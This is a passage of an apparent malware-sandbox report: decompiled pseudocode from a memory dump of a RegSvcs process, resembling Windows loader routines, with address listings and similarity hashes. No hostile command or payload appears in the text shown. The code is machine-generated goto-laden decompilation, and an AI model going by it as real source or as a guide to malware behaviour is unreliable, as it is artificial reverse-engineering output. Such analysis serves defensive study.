                                          																L013177F0( *0x13e7b98, 0, _t353);
                                          																__eflags = _v180 - _t293;
                                          																if(__eflags == 0) {
                                          																	E0132C277(_t293, _t366);
                                          																}
                                          																_t288 = _v164;
                                          																goto L40;
                                          															}
                                          														}
                                          													} else {
                                          														goto L40;
                                          													}
                                          												}
                                          											}
                                          										}
                                          									} else {
                                          										L0130EC7F(_t353);
                                          										L013219B8(_t287, 0, _t353, 0);
                                          										_t200 = E012FF4E3(__eflags);
                                          										continue;
                                          									}
                                          								}
                                          								L41:
                                          								if(_v157 != 0) {
                                          									L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                                          								}
                                          								if(_t366 < 0) {
                                          									L46:
                                          									 *_v212 = _v168;
                                          									_t204 = _t366;
                                          									L47:
                                          									_pop(_t354);
                                          									_pop(_t367);
                                          									_pop(_t289);
                                          									return E0133B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                                          								} else {
                                          									_t206 =  *0x13eb2f8; // 0x0
                                          									if((_t206 |  *0x13eb2fc) == 0 || ( *0x13eb2e4 & 0x00000001) != 0) {
                                          										goto L46;
                                          									} else {
                                          										_t297 =  *0x13eb2ec; // 0x0
                                          										_v200 = 0;
                                          										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
                                          											_t355 = _v168;
                                          											_t342 =  &_v208;
                                          											_t208 = E013A6B68(_v168,  &_v208, _v168, __eflags);
                                          											__eflags = _t208 - 1;
                                          											if(_t208 == 1) {
                                          												goto L46;
                                          											} else {
                                          												__eflags = _v208 & 0x00000010;
                                          												if((_v208 & 0x00000010) == 0) {
                                          													goto L46;
                                          												} else {
                                          													_t342 = 4;
                                          													_t366 = E013A6AEB(_t355, 4,  &_v216);
                                          													__eflags = _t366;
                                          													if(_t366 >= 0) {
                                          														goto L46;
                                          													} else {
                                          														asm("int 0x29");
                                          														_t356 = 0;
                                          														_v44 = 0;
                                          														_t290 = _v52;
                                          														__eflags = 0;
                                          														if(0 == 0) {
                                          															L108:
                                          															_t356 = 0;
                                          															_v44 = 0;
                                          															goto L63;
                                          														} else {
                                          															__eflags = 0;
                                          															if(0 < 0) {
                                          																goto L108;
                                          															}
                                          															L63:
                                          															_v112 = _t356;
                                          															__eflags = _t356;
                                          															if(_t356 == 0) {
                                          																L143:
                                          																_v8 = 0xfffffffe;
                                          																_t211 = 0xc0000089;
                                          															} else {
                                          																_v36 = 0;
                                          																_v60 = 0;
                                          																_v48 = 0;
                                          																_v68 = 0;
                                          																_v44 = _t290 & 0xfffffffc;
                                          																E0130E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                                          																_t306 = _v68;
                                          																__eflags = _t306;
                                          																if(_t306 == 0) {
                                          																	_t216 = 0xc000007b;
                                          																	_v36 = 0xc000007b;
                                          																	_t307 = _v60;
                                          																} else {
                                          																	__eflags = _t290 & 0x00000001;
                                          																	if(__eflags == 0) {
                                          																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                                          																		__eflags = _t349 - 0x10b;
                                          																		if(_t349 != 0x10b) {
                                          																			__eflags = _t349 - 0x20b;
                                          																			if(_t349 == 0x20b) {
                                          																				goto L102;
                                          																			} else {
                                          																				_t307 = 0;
                                          																				_v48 = 0;
                                          																				_t216 = 0xc000007b;
                                          																				_v36 = 0xc000007b;
                                          																				goto L71;
                                          																			}
                                          																		} else {
                                          																			L102:
                                          																			_t307 =  *(_t306 + 0x50);
                                          																			goto L69;
                                          																		}
                                          																		goto L151;
                                          																	} else {
                                          																		_t239 = L0130EAEA(_t290, _t290, _t356, _t366, __eflags);
                                          																		_t307 = _t239;
                                          																		_v60 = _t307;
                                          																		_v48 = _t307;
                                          																		__eflags = _t307;
                                          																		if(_t307 != 0) {
                                          																			L70:
                                          																			_t216 = _v36;
                                          																		} else {
                                          																			_push(_t239);
                                          																			_push(0x14);
                                          																			_push( &_v144);
                                          																			_push(3);
                                          																			_push(_v44);
                                          																			_push(0xffffffff);
                                          																			_t319 = E01339730();
                                          																			_v36 = _t319;
                                          																			__eflags = _t319;
                                          																			if(_t319 < 0) {
                                          																				_t216 = 0xc000001f;
                                          																				_v36 = 0xc000001f;
                                          																				_t307 = _v60;
                                          																			} else {
                                          																				_t307 = _v132;
                                          																				L69:
                                          																				_v48 = _t307;
                                          																				goto L70;
                                          																			}
                                          																		}
                                          																	}
                                          																}
                                          																L71:
                                          																_v72 = _t307;
                                          																_v84 = _t216;
                                          																__eflags = _t216 - 0xc000007b;
                                          																if(_t216 == 0xc000007b) {
                                          																	L150:
                                          																	_v8 = 0xfffffffe;
                                          																	_t211 = 0xc000007b;
                                          																} else {
                                          																	_t344 = _t290 & 0xfffffffc;
                                          																	_v76 = _t344;
                                          																	__eflags = _v40 - _t344;
                                          																	if(_v40 <= _t344) {
                                          																		goto L150;
                                          																	} else {
                                          																		__eflags = _t307;
                                          																		if(_t307 == 0) {
                                          																			L75:
                                          																			_t217 = 0;
                                          																			_v104 = 0;
                                          																			__eflags = _t366;
                                          																			if(_t366 != 0) {
                                          																				__eflags = _t290 & 0x00000001;
                                          																				if((_t290 & 0x00000001) != 0) {
                                          																					_t217 = 1;
                                          																					_v104 = 1;
                                          																				}
                                          																				_t290 = _v44;
                                          																				_v52 = _t290;
                                          																			}
                                          																			__eflags = _t217 - 1;
                                          																			if(_t217 != 1) {
                                          																				_t369 = 0;
                                          																				_t218 = _v40;
                                          																				goto L91;
                                          																			} else {
                                          																				_v64 = 0;
                                          																				E0130E9C0(1, _t290, 0, 0,  &_v64);
                                          																				_t309 = _v64;
                                          																				_v108 = _t309;
                                          																				__eflags = _t309;
                                          																				if(_t309 == 0) {
                                          																					goto L143;
                                          																				} else {
                                          																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                                          																					__eflags = _t226 - 0x10b;
                                          																					if(_t226 != 0x10b) {
                                          																						__eflags = _t226 - 0x20b;
                                          																						if(_t226 != 0x20b) {
                                          																							goto L143;
                                          																						} else {
                                          																							_t371 =  *(_t309 + 0x98);
                                          																							goto L83;
                                          																						}
                                          																					} else {
                                          																						_t371 =  *(_t309 + 0x88);
                                          																						L83:
                                          																						__eflags = _t371;
                                          																						if(_t371 != 0) {
                                          																							_v80 = _t371 - _t356 + _t290;
                                          																							_t310 = _v64;
                                          																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                                          																							_t292 =  *(_t310 + 6) & 0x0000ffff;
                                          																							_t311 = 0;
                                          																							__eflags = 0;
                                          																							while(1) {
                                          																								_v120 = _t311;
                                          																								_v116 = _t348;
                                          																								__eflags = _t311 - _t292;
                                          																								if(_t311 >= _t292) {
                                          																									goto L143;
                                          																								}
                                          																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
                                          																								__eflags = _t371 - _t359;
                                          																								if(_t371 < _t359) {
                                          																									L98:
                                          																									_t348 = _t348 + 0x28;
                                          																									_t311 = _t311 + 1;
                                          																									continue;
                                          																								} else {
                                          																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                                          																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                                          																										goto L98;
                                          																									} else {
                                          																										__eflags = _t348;
                                          																										if(_t348 == 0) {
                                          																											goto L143;
                                          																										} else {
                                          																											_t218 = _v40;
                                          																											_t312 =  *_t218;
                                          																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                                          																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                                          																												_v100 = _t359;
                                          																												_t360 = _v108;
                                          																												_t372 = L01308F44(_v108, _t312);
                                          																												__eflags = _t372;
                                          																												if(_t372 == 0) {
                                          																													goto L143;
                                          																												} else {
                                          																													_t290 = _v52;
                                          																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E01333C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                                          																													_t307 = _v72;
                                          																													_t344 = _v76;
                                          																													_t218 = _v40;
                                          																													goto L91;
                                          																												}
                                          																											} else {
                                          																												_t290 = _v52;
                                          																												_t307 = _v72;
                                          																												_t344 = _v76;
                                          																												_t369 = _v80;
                                          																												L91:
                                          																												_t358 = _a4;
                                          																												__eflags = _t358;
                                          																												if(_t358 == 0) {
                                          																													L95:
                                          																													_t308 = _a8;
                                          																													__eflags = _t308;
                                          																													if(_t308 != 0) {
                                          																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
                                          																													}
                                          																													_v8 = 0xfffffffe;
                                          																													_t211 = _v84;
                                          																												} else {
                                          																													_t370 =  *_t218 - _t369 + _t290;
                                          																													 *_t358 = _t370;
                                          																													__eflags = _t370 - _t344;
                                          																													if(_t370 <= _t344) {
                                          																														L149:
                                          																														 *_t358 = 0;
                                          																														goto L150;
                                          																													} else {
                                          																														__eflags = _t307;
                                          																														if(_t307 == 0) {
                                          																															goto L95;
                                          																														} else {
                                          																															__eflags = _t370 - _t344 + _t307;
                                          																															if(_t370 >= _t344 + _t307) {
                                          																																goto L149;
                                          																															} else {
                                          																																goto L95;
                                          																															}
                                          																														}
                                          																													}
                                          																												}
                                          																											}
                                          																										}
                                          																									}
                                          																								}
                                          																								goto L97;
                                          																							}
                                          																						}
                                          																						goto L143;
                                          																					}
                                          																				}
                                          																			}
                                          																		} else {
                                          																			__eflags = _v40 - _t307 + _t344;
                                          																			if(_v40 >= _t307 + _t344) {
                                          																				goto L150;
                                          																			} else {
                                          																				goto L75;
                                          																			}
                                          																		}
                                          																	}
                                          																}
                                          															}
                                          															L97:
                                          															 *[fs:0x0] = _v20;
                                          															return _t211;
                                          														}
                                          													}
                                          												}
                                          											}
                                          										} else {
                                          											goto L46;
                                          										}
                                          									}
                                          								}
                                          								goto L151;
                                          							}
                                          							_t288 = _v164;
                                          							_t366 = 0xc0000135;
                                          							goto L41;
                                          						}
                                          					}
                                          				}
                                          				L151:
                                          			}
                                          0x0130d7df
                                          0x0135b3d4
                                          0x0135b3d9
                                          0x0135b3dc
                                          0x0135b3dc
                                          0x0135b3df
                                          0x0135b3e2
                                          0x0135b468
                                          0x0135b46d
                                          0x0135b46f
                                          0x0135b46f
                                          0x0135b475
                                          0x0130d8f8
                                          0x0130d8f9
                                          0x0130d8fd
                                          0x0135b3e8
                                          0x0135b3e8
                                          0x0135b3eb
                                          0x0135b3ed
                                          0x00000000
                                          0x0135b3ef
                                          0x0135b3ef
                                          0x0135b3f1
                                          0x0135b3f4
                                          0x0135b3fe
                                          0x0135b404
                                          0x0135b409
                                          0x0135b40e
                                          0x0135b410
                                          0x0135b410
                                          0x0135b414
                                          0x0135b414
                                          0x0135b41b
                                          0x0135b420
                                          0x0135b423
                                          0x0135b425
                                          0x0135b427
                                          0x0135b42a
                                          0x0135b42d
                                          0x0135b42d
                                          0x0135b42a
                                          0x0135b432
                                          0x0135b436
                                          0x0135b438
                                          0x0135b43b
                                          0x0135b43b
                                          0x0135b449
                                          0x0135b44e
                                          0x0135b454
                                          0x0135b458
                                          0x0135b458
                                          0x0135b45d
                                          0x00000000
                                          0x0135b45d
                                          0x0135b3ed
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0130d7df
                                          0x0130d7d2
                                          0x0130d7ca
                                          0x0135b37c
                                          0x0135b37e
                                          0x0135b385
                                          0x0135b38a
                                          0x00000000
                                          0x0135b38a
                                          0x0130d742
                                          0x0130d7f1
                                          0x0130d7f8
                                          0x0135b49b
                                          0x0135b49b
                                          0x0130d800
                                          0x0130d837
                                          0x0130d843
                                          0x0130d845
                                          0x0130d847
                                          0x0130d84a
                                          0x0130d84b
                                          0x0130d84e
                                          0x0130d857
                                          0x0130d802
                                          0x0130d802
                                          0x0130d80d
                                          0x00000000
                                          0x0130d818
                                          0x0130d818
                                          0x0130d824
                                          0x0130d831
                                          0x0135b4a5
                                          0x0135b4ab
                                          0x0135b4b3
                                          0x0135b4b8
                                          0x0135b4bb
                                          0x00000000
                                          0x0135b4c1
                                          0x0135b4c1
                                          0x0135b4c8
                                          0x00000000
                                          0x0135b4ce
                                          0x0135b4d4
                                          0x0135b4e1
                                          0x0135b4e3
                                          0x0135b4e5
                                          0x00000000
                                          0x0135b4eb
                                          0x0135b4f0
                                          0x0135b4f2
                                          0x0130dac9
                                          0x0130dacc
                                          0x0130dacf
                                          0x0130dad1
                                          0x0130dd78
                                          0x0130dd78
                                          0x0130dcf2
                                          0x00000000
                                          0x0130dad7
                                          0x0130dad9
                                          0x0130dadb
                                          0x00000000
                                          0x00000000
                                          0x0130dae1
                                          0x0130dae1
                                          0x0130dae4
                                          0x0130dae6
                                          0x0135b4f9
                                          0x0135b4f9
                                          0x0135b500
                                          0x0130daec
                                          0x0130daec
                                          0x0130daf5
                                          0x0130daf8
                                          0x0130dafb
                                          0x0130db03
                                          0x0130db11
                                          0x0130db16
                                          0x0130db19
                                          0x0130db1b
                                          0x0135b52c
                                          0x0135b531
                                          0x0135b534
                                          0x0130db21
                                          0x0130db21
                                          0x0130db24
                                          0x0130dcd9
                                          0x0130dce2
                                          0x0130dce5
                                          0x0130dd6a
                                          0x0130dd6d
                                          0x00000000
                                          0x0130dd73
                                          0x0135b51a
                                          0x0135b51c
                                          0x0135b51f
                                          0x0135b524
                                          0x00000000
                                          0x0135b524
                                          0x0130dce7
                                          0x0130dce7
                                          0x0130dce7
                                          0x00000000
                                          0x0130dce7
                                          0x00000000
                                          0x0130db2a
                                          0x0130db2c
                                          0x0130db31
                                          0x0130db33
                                          0x0130db36
                                          0x0130db39
                                          0x0130db3b
                                          0x0130db66
                                          0x0130db66
                                          0x0130db3d
                                          0x0130db3d
                                          0x0130db3e
                                          0x0130db46
                                          0x0130db47
                                          0x0130db49
                                          0x0130db4c
                                          0x0130db53
                                          0x0130db55
                                          0x0130db58
                                          0x0130db5a
                                          0x0135b50a
                                          0x0135b50f
                                          0x0135b512
                                          0x0130db60
                                          0x0130db60
                                          0x0130db63
                                          0x0130db63
                                          0x00000000
                                          0x0130db63
                                          0x0130db5a
                                          0x0130db3b
                                          0x0130db24
                                          0x0130db69
                                          0x0130db69
                                          0x0130db6c
                                          0x0130db6f
                                          0x0130db74
                                          0x0135b557
                                          0x0135b557
                                          0x0135b55e
                                          0x0130db7a
                                          0x0130db7c
                                          0x0130db7f
                                          0x0130db82
                                          0x0130db85
                                          0x00000000
                                          0x0130db8b
                                          0x0130db8b
                                          0x0130db8d
                                          0x0130db9b
                                          0x0130db9b
                                          0x0130db9d
                                          0x0130dba0
                                          0x0130dba2
                                          0x0130dba4
                                          0x0130dba7
                                          0x0130dba9
                                          0x0130dbae
                                          0x0130dbae
                                          0x0130dbb1
                                          0x0130dbb4
                                          0x0130dbb4
                                          0x0130dbb7
                                          0x0130dbba
                                          0x0130dcd2
                                          0x0130dcd4
                                          0x00000000
                                          0x0130dbc0
                                          0x0130dbc0
                                          0x0130dbd2
                                          0x0130dbd7
                                          0x0130dbda
                                          0x0130dbdd
                                          0x0130dbdf
                                          0x00000000
                                          0x0130dbe5
                                          0x0130dbe5
                                          0x0130dbee
                                          0x0130dbf1
                                          0x0135b541
                                          0x0135b544
                                          0x00000000
                                          0x0135b546
                                          0x0135b546
                                          0x00000000
                                          0x0135b546
                                          0x0130dbf7
                                          0x0130dbf7
                                          0x0130dbfd
                                          0x0130dbfd
                                          0x0130dbff
                                          0x0130dc0b
                                          0x0130dc15
                                          0x0130dc1b
                                          0x0130dc1d
                                          0x0130dc21
                                          0x0130dc21
                                          0x0130dc23
                                          0x0130dc23
                                          0x0130dc26
                                          0x0130dc29
                                          0x0130dc2b
                                          0x00000000
                                          0x00000000
                                          0x0130dc31
                                          0x0130dc34
                                          0x0130dc36
                                          0x0130dcbf
                                          0x0130dcbf
                                          0x0130dcc2
                                          0x00000000
                                          0x0130dc3c
                                          0x0130dc41
                                          0x0130dc43
                                          0x00000000
                                          0x0130dc45
                                          0x0130dc45
                                          0x0130dc47
                                          0x00000000
                                          0x0130dc4d
                                          0x0130dc4d
                                          0x0130dc50
                                          0x0130dc52
                                          0x0130dc55
                                          0x0130dcfa
                                          0x0130dcfe
                                          0x0130dd08
                                          0x0130dd0a
                                          0x0130dd0c
                                          0x00000000
                                          0x0130dd12
                                          0x0130dd15
                                          0x0130dd2d
                                          0x0130dd2f
                                          0x0130dd32
                                          0x0130dd35
                                          0x00000000
                                          0x0130dd35
                                          0x0130dc5b
                                          0x0130dc5b
                                          0x0130dc5e
                                          0x0130dc61
                                          0x0130dc64
                                          0x0130dc67
                                          0x0130dc67
                                          0x0130dc6a
                                          0x0130dc6c
                                          0x0130dc8e
                                          0x0130dc8e
                                          0x0130dc91
                                          0x0130dc93
                                          0x0130dcce
                                          0x0130dcce
                                          0x0130dc95
                                          0x0130dc9c
                                          0x0130dc6e
                                          0x0130dc72
                                          0x0130dc75
                                          0x0130dc77
                                          0x0130dc79
                                          0x0135b551
                                          0x0135b551
                                          0x00000000
                                          0x0130dc7f
                                          0x0130dc7f
                                          0x0130dc81
                                          0x00000000
                                          0x0130dc83
                                          0x0130dc86
                                          0x0130dc88
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0130dc88
                                          0x0130dc81
                                          0x0130dc79
                                          0x0130dc6c
                                          0x0130dc55
                                          0x0130dc47
                                          0x0130dc43
                                          0x00000000
                                          0x0130dc36
                                          0x0130dc23
                                          0x00000000
                                          0x0130dbff
                                          0x0130dbf1
                                          0x0130dbdf
                                          0x0130db8f
                                          0x0130db92
                                          0x0130db95
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0130db95
                                          0x0130db8d
                                          0x0130db85
                                          0x0130db74
                                          0x0130dc9f
                                          0x0130dca2
                                          0x0130dcb0
                                          0x0130dcb0
                                          0x0130dad1
                                          0x0135b4e5
                                          0x0135b4c8
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0130d831
                                          0x0130d80d
                                          0x00000000
                                          0x0130d800
                                          0x0135b47f
                                          0x0135b485
                                          0x00000000
                                          0x0135b485
                                          0x0130d665
                                          0x0130d652
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: b481ffd16974a71f3252787b8c18d52ee29ca43daaf8b796a90e9b56a9f08ab2
                                          • Instruction ID: 934b75ef296eaa56b9528aa99827619ecad0400e910b3eab9e06afcc66eca7f5
                                          • Opcode Fuzzy Hash: b481ffd16974a71f3252787b8c18d52ee29ca43daaf8b796a90e9b56a9f08ab2
                                          • Instruction Fuzzy Hash: 8FE1BE70A0035ACFEB368F9CC860B69BBF6BF8571CF040199D909AB6D5D730A981CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 67%
                                          			E0132513A(intOrPtr __ecx, void* __edx) {
                                          				signed int _v8;
                                          				signed char _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				char _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				intOrPtr _v44;
                                          				intOrPtr _v48;
                                          				char _v63;
                                          				char _v64;
                                          				signed int _v72;
                                          				signed int _v76;
                                          				signed int _v80;
                                          				signed int _v84;
                                          				signed int _v88;
                                          				signed char* _v92;
                                          				signed int _v100;
                                          				signed int _v104;
                                          				char _v105;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t157;
                                          				signed int _t159;
                                          				signed int _t160;
                                          				unsigned int* _t161;
                                          				intOrPtr _t165;
                                          				signed int _t172;
                                          				signed char* _t181;
                                          				intOrPtr _t189;
                                          				intOrPtr* _t200;
                                          				signed int _t202;
                                          				signed int _t203;
                                          				char _t204;
                                          				signed int _t207;
                                          				signed int _t208;
                                          				void* _t209;
                                          				intOrPtr _t210;
                                          				signed int _t212;
                                          				signed int _t214;
                                          				signed int _t221;
                                          				signed int _t222;
                                          				signed int _t226;
                                          				intOrPtr* _t232;
                                          				signed int _t233;
                                          				signed int _t234;
                                          				intOrPtr _t237;
                                          				intOrPtr _t238;
                                          				intOrPtr _t240;
                                          				void* _t245;
                                          				signed int _t246;
                                          				signed int _t247;
                                          				void* _t248;
                                          				void* _t251;
                                          				void* _t252;
                                          				signed int _t253;
                                          				signed int _t255;
                                          				signed int _t256;
                                          
                                          				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                                          				_v8 =  *0x13ed360 ^ _t255;
                                          				_v32 = _v32 & 0x00000000;
                                          				_t251 = __edx;
                                          				_t237 = __ecx;
                                          				_t212 = 6;
                                          				_t245 =  &_v84;
                                          				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                                          				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                                          				_v48 = __ecx;
                                          				_v36 = _t207;
                                          				_t157 = memset(_t245, 0, _t212 << 2);
                                          				_t256 = _t255 + 0xc;
                                          				_t246 = _t245 + _t212;
                                          				if(_t207 == 2) {
                                          					_t247 =  *(_t237 + 0x60);
                                          					_t208 =  *(_t237 + 0x64);
                                          					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                                          					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                                          					_v104 = _t159;
                                          					_v76 = _t159;
                                          					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                                          					_v100 = _t160;
                                          					_v72 = _t160;
                                          					L19:
                                          					_v80 = _t208;
                                          					_v84 = _t247;
                                          					L8:
                                          					_t214 = 0;
                                          					if( *(_t237 + 0x74) > 0) {
                                          						_t82 = _t237 + 0x84; // 0x124
                                          						_t161 = _t82;
                                          						_v92 = _t161;
                                          						while( *_t161 >> 0x1f != 0) {
                                          							_t200 = _v92;
                                          							if( *_t200 == 0x80000000) {
                                          								break;
                                          							}
                                          							_t214 = _t214 + 1;
                                          							_t161 = _t200 + 0x10;
                                          							_v92 = _t161;
                                          							if(_t214 <  *(_t237 + 0x74)) {
                                          								continue;
                                          							}
                                          							goto L9;
                                          						}
                                          						_v88 = _t214 << 4;
                                          						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                                          						_t165 = 0;
                                          						asm("adc eax, [ecx+edx+0x7c]");
                                          						_v24 = _t165;
                                          						_v28 = _v40;
                                          						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                                          						_t221 = _v40;
                                          						_v16 =  *_v92;
                                          						_v32 =  &_v28;
                                          						if( *(_t237 + 0x4e) >> 0xf == 0) {
                                          							goto L9;
                                          						}
                                          						_t240 = _v48;
                                          						if( *_v92 != 0x80000000) {
                                          							goto L9;
                                          						}
                                          						 *((intOrPtr*)(_t221 + 8)) = 0;
                                          						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                                          						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                                          						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                                          						_t226 = 0;
                                          						_t181 = _t251 + 0x66;
                                          						_v88 = 0;
                                          						_v92 = _t181;
                                          						do {
                                          							if( *((char*)(_t181 - 2)) == 0) {
                                          								goto L31;
                                          							}
                                          							_t226 = _v88;
                                          							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                                          								_t181 = E0133D0F0(1, _t226 + 0x20, 0);
                                          								_t226 = _v40;
                                          								 *(_t226 + 8) = _t181;
                                          								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                                          								L34:
                                          								if(_v44 == 0) {
                                          									goto L9;
                                          								}
                                          								_t210 = _v44;
                                          								_t127 = _t210 + 0x1c; // 0x1c
                                          								_t249 = _t127;
                                          								E01312280(_t181, _t127);
                                          								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                                          								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                                          								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                                          									L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                                          								}
                                          								_t189 = L01314620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                                          								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                                          								if(_t189 != 0) {
                                          									 *((intOrPtr*)(_t189 + 8)) = _v20;
                                          									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                                          									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                                          									 *_t232 = _t232 + 0x10;
                                          									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                                          									E0133F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                                          									_t256 = _t256 + 0xc;
                                          								}
                                          								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                                          								E0130FFB0(_t210, _t249, _t249);
                                          								_t222 = _v76;
                                          								_t172 = _v80;
                                          								_t208 = _v84;
                                          								_t247 = _v88;
                                          								L10:
                                          								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                                          								_v44 = _t238;
                                          								if(_t238 != 0) {
                                          									 *0x13eb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                                          									_v44();
                                          								}
                                          								_pop(_t248);
                                          								_pop(_t252);
                                          								_pop(_t209);
                                          								return E0133B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                                          							}
                                          							_t181 = _v92;
                                          							L31:
                                          							_t226 = _t226 + 1;
                                          							_t181 =  &(_t181[0x18]);
                                          							_v88 = _t226;
                                          							_v92 = _t181;
                                          						} while (_t226 < 4);
                                          						goto L34;
                                          					}
                                          					L9:
                                          					_t172 = _v104;
                                          					_t222 = _v100;
                                          					goto L10;
                                          				}
                                          				_t247 = _t246 | 0xffffffff;
                                          				_t208 = _t247;
                                          				_v84 = _t247;
                                          				_v80 = _t208;
                                          				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                                          					_t233 = _v72;
                                          					_v105 = _v64;
                                          					_t202 = _v76;
                                          				} else {
                                          					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                                          					_v105 = 1;
                                          					if(_v63 <= _t204) {
                                          						_v63 = _t204;
                                          					}
                                          					_t202 = _v76 |  *(_t251 + 0x40);
                                          					_t233 = _v72 |  *(_t251 + 0x44);
                                          					_t247 =  *(_t251 + 0x38);
                                          					_t208 =  *(_t251 + 0x3c);
                                          					_v76 = _t202;
                                          					_v72 = _t233;
                                          					_v84 = _t247;
                                          					_v80 = _t208;
                                          				}
                                          				_v104 = _t202;
                                          				_v100 = _t233;
                                          				if( *((char*)(_t251 + 0xc4)) != 0) {
                                          					_t237 = _v48;
                                          					_v105 = 1;
                                          					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                                          						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                                          						_t237 = _v48;
                                          					}
                                          					_t203 = _t202 |  *(_t251 + 0xb8);
                                          					_t234 = _t233 |  *(_t251 + 0xbc);
                                          					_t247 = _t247 &  *(_t251 + 0xb0);
                                          					_t208 = _t208 &  *(_t251 + 0xb4);
                                          					_v104 = _t203;
                                          					_v76 = _t203;
                                          					_v100 = _t234;
                                          					_v72 = _t234;
                                          					_v84 = _t247;
                                          					_v80 = _t208;
                                          				}
                                          				if(_v105 == 0) {
                                          					_v36 = _v36 & 0x00000000;
                                          					_t208 = 0;
                                          					_t247 = 0;
                                          					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                                          					goto L19;
                                          				} else {
                                          					_v36 = 1;
                                          					goto L8;
                                          				}
                                          			}

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: b101ed75b23029da9d2c6fa31e687b585f3626cf73725b917c36276baed80b69
                                          • Instruction ID: e6400d15975d5e287692768f50b0dad153929c9a33812f2b9cea50d67e03d5f2
                                          • Opcode Fuzzy Hash: b101ed75b23029da9d2c6fa31e687b585f3626cf73725b917c36276baed80b69
                                          • Instruction Fuzzy Hash: E4C134B55083818FD354CF28C580A5AFBF5BF88308F14896EF9998B392D771E945CB42
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 74%
                                          			E013203E2(signed int __ecx, signed int __edx) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				intOrPtr _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				char _v52;
                                          				char _v56;
                                          				char _v64;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t56;
                                          				signed int _t58;
                                          				char* _t64;
                                          				intOrPtr _t65;
                                          				signed int _t74;
                                          				signed int _t79;
                                          				char* _t83;
                                          				intOrPtr _t84;
